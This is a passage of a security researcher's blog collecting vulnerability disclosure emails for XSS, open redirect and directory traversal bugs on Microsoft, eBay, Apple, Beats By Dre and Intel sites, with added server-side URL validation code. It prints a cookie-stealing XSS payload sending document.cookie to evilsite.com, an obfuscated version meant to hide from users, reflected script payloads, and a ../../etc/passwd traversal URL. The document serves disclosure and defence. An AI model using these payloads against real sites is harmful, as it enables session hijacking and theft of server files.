In the URLs described above the parameter <strong>url= </strong>is vulnerable to open redirect. An attacker is able to provide a custom URL to which the victim will be redirected. An attacker can impersonate his malicious URL as Intel's.</div>
<div>
</div>
<div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-WnsbWz5G7oQ/WF0WA9_iUgI/AAAAAAAAAAo/3B4YG1LTc7AGnwkLF-IgLYXfpqtggWJpQCLcB/s1600/7_26_ResearcherCertificate_Amit_Kumar.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://1.bp.blogspot.com/-WnsbWz5G7oQ/WF0WA9_iUgI/AAAAAAAAAAo/3B4YG1LTc7AGnwkLF-IgLYXfpqtggWJpQCLcB/s400/7_26_ResearcherCertificate_Amit_Kumar.jpg" width="400" /></a></div>
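Both this report and the Jotform report above come down to the same missing control: a URL supplied by the user is used without checking where it points. The following is an added example (my own code, not Jotform's or Intel's) of the two server-side checks a defender would apply. safe_href covers the hyperlink case, rejecting pseudo-URLs such as javascript: (including variants with mixed case or embedded control characters, which browsers ignore before parsing) and allowing only an explicit scheme list; safe_redirect_target covers the url= redirect case, accepting only relative paths that resolve to the site's own host. The host name, the scheme list and the function names are assumptions.

```python
"""Validation for user-supplied URLs in two contexts: stored hyperlinks and
post-action redirects.

Added example, not the code of the services in the reports. OWN_HOST and the
scheme allow-list are assumptions made for the demonstration.
"""
from urllib.parse import urljoin, urlsplit

OWN_HOST = "example.com"                                 # assumed
ALLOWED_LINK_SCHEMES = frozenset({"http", "https", "mailto"})  # assumed


def _normalise(raw):
    # Browsers drop ASCII control characters and surrounding whitespace before
    # parsing, so "java\tscript:" reaches the browser as "javascript:". A
    # validator has to see the same string the browser will.
    return "".join(ch for ch in raw.strip() if ord(ch) > 0x1F)


def safe_href(raw):
    """Return a URL fit to place in an href attribute, or None to reject it.

    A stored 'javascript:' hyperlink executes when clicked, which is the
    persistent XSS in the Jotform report. Scheme-less input is prefixed with
    https:// instead of being trusted as-is; protocol-relative input is
    rejected because its scheme is whatever the embedding page uses.
    """
    url = _normalise(raw)
    if url.startswith("//"):
        return None
    parts = urlsplit(url)
    if parts.scheme == "":
        url = "https://" + url
        parts = urlsplit(url)
    if parts.scheme not in ALLOWED_LINK_SCHEMES:   # urlsplit lower-cases the scheme
        return None
    return url


def safe_redirect_target(raw):
    """Return a redirect target confined to our own site, or None to reject it.

    The open redirect in the report works because url= accepts any absolute
    URL. Here only a relative path is allowed: absolute URLs, protocol-relative
    '//host' forms and backslashes (which browsers treat like '/') are refused,
    and the resolved host is checked as a second line of defence.
    """
    url = _normalise(raw)
    if not url.startswith("/") or url.startswith("//") or "\\" in url:
        return None
    resolved = urlsplit(urljoin(f"https://{OWN_HOST}/", url))
    if resolved.netloc != OWN_HOST:
        return None
    return resolved.path + (f"?{resolved.query}" if resolved.query else "")


if __name__ == "__main__":
    for candidate in ("https://www.owasp.org/", "javascript:alert(1)", "java\tscript:alert(1)"):
        print(repr(candidate), "->", safe_href(candidate))
    for candidate in ("/terms?accepted=1", "http://evilsite.com", "//evilsite.com"):
        print(repr(candidate), "->", safe_redirect_target(candidate))
```

For redirects, an allow-list of relative paths is the simplest fix; where external destinations are a real requirement, the usual alternative is an interstitial page that shows the destination host to the user before leaving the site.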
<div>
</div>
</div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com0tag:blogger.com,1999:blog-7421436727677135031.post-4524217679192577882016-07-07T05:47:00.000-07:002016-07-07T05:47:12.671-07:00[Vulnerability Report] Non-Persistent XSS on Beats By Dre<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="irc_mimg irc_hic ibE5E2ITjHEA-lvVgf-rIiHk">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://logok.org/wp-content/uploads/2014/08/beats-by-dr-dre-logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://logok.org/wp-content/uploads/2014/08/beats-by-dr-dre-logo.png" height="300" width="400" /></a></div>
---------Following is the email which I had sent to Apple Product Security----------<br />
<br />
</div>
<div class="irc_mimg irc_hic ibE5E2ITjHEA-lvVgf-rIiHk">
<b>Vulnerability type:</b> Non-Persistent XSS</div>
<br />
<b>Affected URL:</b> <i><a href="https://deref-mail-02.com/mail/client/dereferrer/?redirectUrl=https%3A%2F%2Ftempo.api.beatsbydre.com%2Fv1%2Flogin%2F%3Freturn%3D%2522%253E%253C%2Fform%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%2Fscript%253E" target="_blank">https://tempo.api.beatsbydre.com/v1/login/?return=%22%3E%3C/form%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E</a></i><br />
<br />
<b>Attack Scenario: </b>An attacker is able to trick an authenticated user into visiting a malicious URL,<br />
which is capable of stealing the user's session and taking over his Apple account.<br />
<br />
Best Regards<br />
Amit Kumar<br />
<i>cse@engineer.com</i><br />
<i>-------------------------------------------------------------------------------------------------------------------------</i><br />
<br />
<b>Preview:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://s27.postimg.org/cgie9giar/sdfsdsd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://s27.postimg.org/cgie9giar/sdfsdsd.png" /></a></div>
</div>
[Vulnerability Report] Persistent XSS on Microsoft.com (posted by Amit Sangra, 2016-07-05, updated 2017-03-25)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-cu4P647hLog/WNZHWwHvPPI/AAAAAAAAAEA/FEKR3SMubLkC_UIBU9JdMZBxHO5xocaXwCEw/s1600/microsoft-logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://2.bp.blogspot.com/-cu4P647hLog/WNZHWwHvPPI/AAAAAAAAAEA/FEKR3SMubLkC_UIBU9JdMZBxHO5xocaXwCEw/s640/microsoft-logo.jpg" width="640" /></a></div>
<ul class="actions article-actions article-footer-actions"><br />Report: Get your Microsoft account hijacked by simply clicking connect button<div class="prose">
<br />
The following is my report on a serious vulnerability which I had discovered on Microsoft.com, for which I was also awarded a place at <em>Microsoft Hall of Fame</em>.<br />
<br />
<em>------------------Following is the email which I had sent to MSRC------------------</em><br />
<br />
<em>Amit Kumar &lt;cse@engineer.com&gt; wrote:</em><br />
<br />
Hello, my name is Amit Kumar and I am a security researcher. The following is my report on a medium-high risk vulnerability which is present on Microsoft's social profile page.<br />
<br />
<strong>Test Account:</strong> <em>MSOBBcse@outlook.com </em><br />
<br />
<strong>Vulnerability Type:</strong> Persistent XSS<br />
<br />
<strong>Affected URL:</strong><em> https://social.microsoft.com/Profile/MSOBB_Test_Account</em><br />
<em>https://social.<strong>msdn</strong>.microsoft.com/Profile/MSOBB_Test_Account</em><br />
<br />
<strong>Abstract:</strong> The affected URL is vulnerable to persistent XSS due to which an attacker is able to hijack user account sessions.<br />
<br />
<strong>Scope:</strong> Social Connect buttons (Twitter, Facebook, LinkedIn, XING) of the affected URL.<br />
<br />
<strong>Risk Level:</strong> Medium-High<br />
<br />
<strong>Vulnerability Impact Scenario:</strong> A user visits an affected profile and clicks the Facebook icon under the contact section, after which he is redirected to the attacker's Facebook profile, which looks normal to the user. But in the backend, his session cookies were sent as a GET request to the attacker's web server, where they were stored; after that the user was redirected to the attacker's Facebook profile as he was expecting.<br />
<br />
<strong>Payload:</strong><em> javascript:location.href=("http://evilsite.com?q.php?cookie="+document.cookie)</em> <br />
<br />
<strong>Obfuscated Payload:</strong><em> javascript:/*http://facebook.com/profile.php?id=6735824l987&</em><br />
<em>redirect=*/location.href%3D%28%22http%3A%2f%2fevilsite.com%3Fq.php%3Fcookie%3D%22%2bdocument.cookie%29</em><br />
(Contains noise and obfuscated code so that a normal user is not able to identify the malicious code just by hovering over the social buttons)<br />
<br />
<strong>Tools Used:</strong><br />
Firefox + Addon: TamperData<br />
<em>Note: Screenshots are included in the attachments.</em> <br />
<br />
<strong>Vulnerability Reproduction Steps (POC):</strong> <br />
<br />
1. Visit the URL <em>"https://social.microsoft.com/Profile/u/edit"</em> <br />
<br />
2. Add a Facebook profile URL such as <em>"http://facebook/com/demouser"</em> <br />
<br />
3. Open TamperData and click "<strong>Start Tampering</strong>", then click "submit" on the edit page.<br />
<br />
4. Tamper with the POST request sent by the following URL: <em>"https://social.microsoft.com/Profile/u/edit?displayName=MSOBB_Test_Account"</em> <br />
<br />
5. Modify the following POST parameter: <em>name="SocialLink_Facebook"\r\n\r\nhttp://facebook/com/demouser\r\n--------</em> and <strong>replace</strong> it with our <strong>Payload</strong> (mentioned above).<br />
<br />
6. Open TamperData and click "Stop Tampering".<br />
<br />
7. Now our malicious JavaScript code is embedded in our social profile button.<br />
<br />
8. Now the attack will be performed whenever a user tries to connect with us through our social profile buttons.<br />
<br />
<strong>Brief description of the issue:</strong> The vulnerability I am reporting is caused by client-side-only input validation (no server-side validation) of the social profile link at the Affected URL; by modifying the HTTP headers of the POST request, an attacker is able to provide his own custom malicious code in place of the social profile URL, which can be used to capture the session cookies of the logged-in user.<br />
<br />
By capturing the session cookies an attacker is able to completely take over the user's Microsoft account and most of his Microsoft-connected services (tested with Outlook).<br />
<br />
During my research I have also discovered that the Microsoft Social homepage (<em>https://social.microsoft.com/Profile/</em>) shows a leaderboard of Most Active Contributors. These contributors get visited daily by a large number of users; if an attacker is able to get his malicious profile on the list, then a large number of users can be affected by this vulnerability, which is a very serious issue and a cause for concern. My suggestion is to patch this vulnerability as soon as possible before it gets discovered by some cracker and gets exploited.<br />
<br />
Let me know if you require any other information, I will be happy to assist.<br />
<em>Regards<br />Amit Kumar(Ak)<br />cse@engineer.com</em><br />
<em>-------------------------------------End of eMail-------------------------------------</em></div>
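The root cause named in the report above is validation that ran only in the browser. As an added example, which is neither part of the report nor Microsoft's code, the following Node.js snippet shows the server-side checks that reject a <em>javascript:</em> link regardless of the <em>facebook.com</em> noise embedded in it, plus the attribute escaping that also covers a reflected parameter such as the <em>return</em> value in the Beats By Dre report above. The provider host allowlist and the function names are assumptions made for this example.

```javascript
// Added example, not code from the report or from Microsoft: the server-side
// checks the report says were missing. Node.js, built-in WHATWG URL only.

// Hosts each social-link field may point at. Assumption: these four
// providers are the ones the profile edit form offers.
const ALLOWED_HOSTS = {
  facebook: ['facebook.com', 'www.facebook.com'],
  twitter: ['twitter.com', 'www.twitter.com'],
  linkedin: ['linkedin.com', 'www.linkedin.com'],
  xing: ['xing.com', 'www.xing.com'],
};

/**
 * Validates one submitted social profile link on the server, independently
 * of whatever the browser-side form did. Returns the canonical https URL to
 * store, or null when the value must be rejected.
 */
function validateSocialLink(provider, raw) {
  const hosts = ALLOWED_HOSTS[provider];
  if (!hosts || typeof raw !== 'string' || raw.length > 2048) return null;
  let url;
  try {
    url = new URL(raw.trim());          // throws unless raw is an absolute URL
  } catch {
    return null;
  }
  // Scheme allowlist. "javascript:/*http://facebook.com/...*/location.href"
  // parses with protocol "javascript:", so the facebook.com text inside the
  // comment never reaches the host check below.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  if (url.username || url.password) return null;   // no userinfo tricks
  if (!hosts.includes(url.hostname.toLowerCase())) return null;
  url.protocol = 'https:';                          // store the https form
  return url.href;
}

/**
 * Escapes a value for use inside a double-quoted HTML attribute, so that a
 * stored link (or a reflected query parameter) cannot close the attribute
 * or the element it sits in.
 */
function escapeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

/** Renders a validated link as an anchor; a rejected (null) link renders nothing. */
function renderSocialAnchor(provider, href) {
  if (href === null) return '';
  return `<a href="${escapeHtmlAttr(href)}" rel="noopener noreferrer">${escapeHtmlAttr(provider)}</a>`;
}
```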
<div class="prose">
<b>Proof of Concept:</b></div>
<div class="prose">
<b><br /></b></div>
<div class="prose">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-CbWDcCs_OHg/WKq2HdVbsUI/AAAAAAAAAB8/8wJu6iKVMhMIORZmE8n3_1s3MX9BExQswCLcB/s1600/XSS%2Bcookie%2Balert.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://1.bp.blogspot.com/-CbWDcCs_OHg/WKq2HdVbsUI/AAAAAAAAAB8/8wJu6iKVMhMIORZmE8n3_1s3MX9BExQswCLcB/s640/XSS%2Bcookie%2Balert.JPG" width="640" /></a></div>
<b><br /></b></div>
<div class="prose">
<b>Hall of Fame:</b></div>
<div class="prose">
<b><br /></b></div>
<div class="prose">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-Fm2h9KX_nMc/WKq15gPxCQI/AAAAAAAAAB0/WzvoKz8nY5AwLWXcoD6UbguiDlG1v2ngQCLcB/s1600/Microsoft%2BApril.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-Fm2h9KX_nMc/WKq15gPxCQI/AAAAAAAAAB0/WzvoKz8nY5AwLWXcoD6UbguiDlG1v2ngQCLcB/s1600/Microsoft%2BApril.JPG" /></a></div>
<em><br /></em></div>
</ul>
</div>
[Vulnerability Report] Non-Persistent XSS on eBay.com (posted by Amit Sangra, 2015-09-10, updated 2017-02-20)<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<img alt="eBay logo" height="256" src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/1b/EBay_logo.svg/2000px-EBay_logo.svg.png" style="margin-top: 45px;" width="640" /><br />
<div class="MsoNormal">
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The following is my report on a serious vulnerability which I had discovered on eBay.com, for which I was also awarded a place at <em>eBay Hall of Fame</em>.</span></div>
<div class="MsoNormal">
<span style="font-size: large;"><br /></span> <span style="font-size: large;"></span></div>
<div class="MsoNormal">
<span style="font-size: large;"><em>---Following is the email which I had sent to eBay Security Team---</em></span></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;"><b>Vulnerability Type:</b> Non-Persistent XSS </span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;"><b>Scope URL:</b> <i><a href="http://cgi6.ebay.com/ws/eBayISAPI.dll-SolutionsDirectory" target="_blank">http://cgi6.ebay.com/ws/eBayISAPI.dll-SolutionsDirectory</a></i></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;"><b>Proof-of-Concept URL:</b> <i><a href="http://cgi6.ebay.com/ws/eBayISAPI.dll-MfcISAPICommand=SolutionsDirectory&page=results&sort=noSort&searchText=%22]}%3B%3C%2Fscript%3E%3C%2Ftd%3E%3C%2Ftr%3E%3CBODY+ONLOAD%3Dalert%28%22XSS-By-Ak%22%29%3E%3B&Submit=Search+Directory" target="_blank">http://cgi6.ebay.com/ws/eBayISAPI.dll-MfcISAPICommand=SolutionsDirectory&page=results&sort=noSort&searchText=%22]}%3B%3C%2Fscript%3E%3C%2Ftd%3E%3C%2Ftr%3E%3CBODY+ONLOAD%3Dalert%28%22XSS-By-Ak%22%29%3E%3B&Submit=Search+Directory</a></i></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><b><span style="font-family: "times new roman" , serif;">Vulnerability Reproduction Steps (POC): </span></b></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">1. Visit the Scope URL as mentioned above. </span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">2. Enter the following payload in the search field: <i>"]};; <script>alert("XSS-By-Ak")</script></i></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">3. After the search our URL becomes the same as POC URL which delivers the XSS alert payload "XSS-By-Ak" </span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">System Details: Firefox 41 on Windows 8.1 </span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">Let me know if you require any other information, I will be happy to assist. </span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">Regards </span></span></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;">Amit Kumar(Ak) </span></span></div>
<div class="MsoNormal">
<span style="font-size: large;"><span style="font-family: "times new roman" , serif;"><a href="mailto:cse@engineer.com">cse@engineer.com</a></span></span></div>
<div class="MsoNormal">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;"><span style="font-size: large;"><em>-------------------------------------End of eMail-------------------------------------</em></span> </span><br />
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;"><br /></span>
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;"><b>Acknowledgement:</b></span><br />
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;"><b><br /></b></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-xozoHPeGJTk/WKq3s4VuxnI/AAAAAAAAACI/70oY7jMo_wU_W8Wk13BvgVhyFkbAbZVZQCLcB/s1600/ebay.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-xozoHPeGJTk/WKq3s4VuxnI/AAAAAAAAACI/70oY7jMo_wU_W8Wk13BvgVhyFkbAbZVZQCLcB/s1600/ebay.JPG" /></a></div>
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;"><b><br /></b></span></div>
</div>
</div>
[Vulnerability Report] Directory Traversal Attack in subdomain of Apple.com (posted by Amit Sangra, 2015-07-07, updated 2017-03-25)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-cgqH7H9N7sM/WNZGk5UVAdI/AAAAAAAAAD4/UIjM5eFo_1Q6yuxfNMuhpCCOB-xtIINjgCLcB/s1600/AAEAAQAAAAAAAAUgAAAAJGUwYjYzYmVjLTgwNGUtNGYzYi1hZmVkLTNjMmQ3MTVlNTUxYQ.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://1.bp.blogspot.com/-cgqH7H9N7sM/WNZGk5UVAdI/AAAAAAAAAD4/UIjM5eFo_1Q6yuxfNMuhpCCOB-xtIINjgCLcB/s400/AAEAAQAAAAAAAAUgAAAAJGUwYjYzYmVjLTgwNGUtNGYzYi1hZmVkLTNjMmQ3MTVlNTUxYQ.jpg" width="400" /></a></div>
<br />
Report: Apple flaw that leads to sensitive file disclosure<br />
<br />
The following is my report on a serious vulnerability which I had discovered on one of apple.com's subdomains, for which I was also awarded a place at <i>Apple Hall of Fame</i>.<br />
<br />
<i>------------------Following is the email which I had sent to Apple------------------</i><br />
<br />
<b>Vulnerability Type:</b> Directory Traversal Attack<br />
<br />
<b>Abstract:</b> I have discovered one of apple.com's subdomains to be vulnerable to a <i>directory traversal attack</i>, which allows a remote attacker to access sensitive files saved on the web server that were not intended to be accessible by an unprivileged user.<br />
<br />
<b>Scope:</b> <i><a href="http://consultants.apple.com" rel="nofollow" target="_blank">http://consultants.apple.com</a></i><br />
<br />
<b>Risk Level:</b> High<br />
<br />
<b>Vulnerability Description: </b> Directory traversal is a type of HTTP exploit that is used by attackers to gain unauthorized access to restricted directories and files. Directory traversal attacks use web server software to exploit inadequate security mechanisms giving them root access to directories and files stored on the webserver.<br />
<br />
<b>Affected URL:</b> <i><a href="https://consultants.apple.com/publicLocator/downloadProfile/downloadProfile?execution=e1s1&id=%2Fimages%2FpublicLocator%2FPDF_RequirementstoJoin_ACN_May2015.pdf" rel="nofollow" target="_blank">https://consultants.apple.com/publicLocator/downloadProfile/downloadProfile?execution=e1s1&id=%2Fimages%2FpublicLocator%2FPDF_RequirementstoJoin_ACN_May2015.pdf</a></i><br />
<br />
<b>Vulnerability Impact Scenario: </b><br />
A remote attacker is able to download critical files from Apple's web server such as <i>/etc/passwd</i>, configuration files and log files, which may result in "<i>Sensitive Information Disclosure</i>" and may also allow the attacker to carry out further attacks on the system using the information gathered through this vulnerability.<br />
<br />
<b>Vulnerability Reproduction Steps (POC):</b><br />
<br />
<b>1.</b> Visit the Affected URL as mentioned above.<br />
<br />
<b>2.</b> Modify the following parameter "<i>e1s1&id=%2Fimages%2FpublicLocator%2FPDF_RequirementstoJoin_ACN_May2015.pdf</i>" with "<i>../../../../../../../etc/passwd</i>"<br />
<br />
<b>3.</b> So our final URL becomes "<b><i>https://consultants.apple.com/publicLocator/downloadProfile/downloadProfile?execution=e1s1&id=../../../../../../../etc/passwd</i></b>"<br />
<br />
<b>4.</b> The final URL which we have generated allows us to traverse the /root directory of the web server, and as a POC (Proof of Concept) we can see that the URL we have generated allows us to view the <i>/etc/passwd</i> file of the system.<br />
<br />
<b>Brief description of the issue: </b> The vulnerability I am reporting is known as a <i>Directory Traversal Attack</i>, which is caused by poor input validation in the <i>Affected URL</i>: the "<i><b>id=</b></i>" parameter of the affected URL accepts the path of the file to be downloaded, but due to insufficient security validation/sanitization of user-supplied file names we can provide custom queries and traverse up to the root directory of the web server using "<i><b>../</b></i>" (go up).<br />
<div class="prose">
<br />
Directory Traversal Attack is a serious vulnerability which is capable of compromising the entire web server, not just the single subdomain which I have reported but all the websites which are hosted on the same server. My suggestion is to patch this vulnerability as soon as possible before it gets discovered by some cracker and gets exploited.<br />
<br />
Let me know if you require any other information, I will be happy to assist.<br />
<br />
<i>Regards</i><br />
<i>Amit Kumar(Ak)</i><br />
<i><a href="mailto:cse@engineer.com" rel="nofollow" target="_blank">cse@engineer.com</a></i><br />
<i>-------------------------------------End of eMail-------------------------------------</i><br />
<i><br /></i>
<b>Acknowledgement:</b><br />
<i><br /></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-nCbmh_XYIr4/WKq3MUxxM0I/AAAAAAAAACE/9z7JgeiNacARzEzoXZWVg3huXI-CS1-qwCLcB/s1600/Apple.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://3.bp.blogspot.com/-nCbmh_XYIr4/WKq3MUxxM0I/AAAAAAAAACE/9z7JgeiNacARzEzoXZWVg3huXI-CS1-qwCLcB/s640/Apple.JPG" width="640" /></a></div>
<i><br /></i></div>
</div>